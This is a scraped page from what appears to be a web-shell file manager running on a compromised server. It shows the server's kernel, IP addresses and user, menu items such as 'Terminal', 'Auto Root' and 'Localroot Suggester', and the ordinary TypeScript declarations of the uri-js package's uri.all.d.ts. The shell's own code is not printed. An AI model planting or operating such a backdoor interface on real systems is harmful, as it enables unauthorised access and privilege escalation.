Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.15.147.225
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
uri-js /
dist /
es5 /
Delete
Unzip
Name
Size
Permission
Date
Action
uri.all.d.ts
2.39
KB
-rwxrwxr-x
2022-08-30 11:49
uri.all.js
55.96
KB
-rwxrwxr-x
2022-08-30 11:49
uri.all.js.map
99.8
KB
-rwxrwxr-x
2022-08-30 11:49
uri.all.min.d.ts
2.39
KB
-rwxrwxr-x
2022-08-30 11:49
uri.all.min.js
16.8
KB
-rwxrwxr-x
2022-08-30 11:49
uri.all.min.js.map
81.14
KB
-rwxrwxr-x
2022-08-30 11:49
Save
Rename
export interface URIComponents { scheme?: string; userinfo?: string; host?: string; port?: number | string; path?: string; query?: string; fragment?: string; reference?: string; error?: string; } export interface URIOptions { scheme?: string; reference?: string; tolerant?: boolean; absolutePath?: boolean; iri?: boolean; unicodeSupport?: boolean; domainHost?: boolean; } export interface URISchemeHandler<Components extends URIComponents = URIComponents, Options extends URIOptions = URIOptions, ParentComponents extends URIComponents = URIComponents> { scheme: string; parse(components: ParentComponents, options: Options): Components; serialize(components: Components, options: Options): ParentComponents; unicodeSupport?: boolean; domainHost?: boolean; absolutePath?: boolean; } export interface URIRegExps { NOT_SCHEME: RegExp; NOT_USERINFO: RegExp; NOT_HOST: RegExp; NOT_PATH: RegExp; NOT_PATH_NOSCHEME: RegExp; NOT_QUERY: RegExp; NOT_FRAGMENT: RegExp; ESCAPE: RegExp; UNRESERVED: RegExp; OTHER_CHARS: RegExp; PCT_ENCODED: RegExp; IPV4ADDRESS: RegExp; IPV6ADDRESS: RegExp; } export declare const SCHEMES: { [scheme: string]: URISchemeHandler; }; export declare function pctEncChar(chr: string): string; export declare function pctDecChars(str: string): string; export declare function parse(uriString: string, options?: URIOptions): URIComponents; export declare function removeDotSegments(input: string): string; export declare function serialize(components: URIComponents, options?: URIOptions): string; export declare function resolveComponents(base: URIComponents, relative: URIComponents, options?: URIOptions, skipNormalization?: boolean): URIComponents; export declare function resolve(baseURI: string, relativeURI: string, options?: URIOptions): string; export declare function normalize(uri: string, options?: URIOptions): string; export declare function normalize(uri: URIComponents, options?: URIOptions): URIComponents; export declare function equal(uriA: string, uriB: string, options?: URIOptions): boolean; export declare function equal(uriA: URIComponents, uriB: URIComponents, options?: URIOptions): boolean; export declare function escapeComponent(str: string, options?: URIOptions): string; export declare function unescapeComponent(str: string, options?: URIOptions): string;